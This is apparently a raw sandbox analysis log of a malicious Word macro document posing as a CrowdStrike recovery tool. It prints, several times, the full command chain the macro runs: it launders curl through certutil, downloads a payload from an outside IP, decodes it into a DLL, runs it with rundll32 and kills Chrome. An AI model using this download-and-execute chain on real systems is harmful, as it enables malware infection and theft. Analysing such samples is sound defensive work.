Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{EDECE918-A2EA-49DC-A414-445477A4F37D} - OProcSessId.dat

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: Element design set.dotx.0.dr	OLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	OLE indicator, Word Document stream: true
Source: Equations.dotx.0.dr	OLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.dr	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.26.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE document summary: title field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE document summary: author field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE document summary: edited time not present or 0
Source: ~WRC0000.tmp.26.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\xcopy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: mswsock.dll
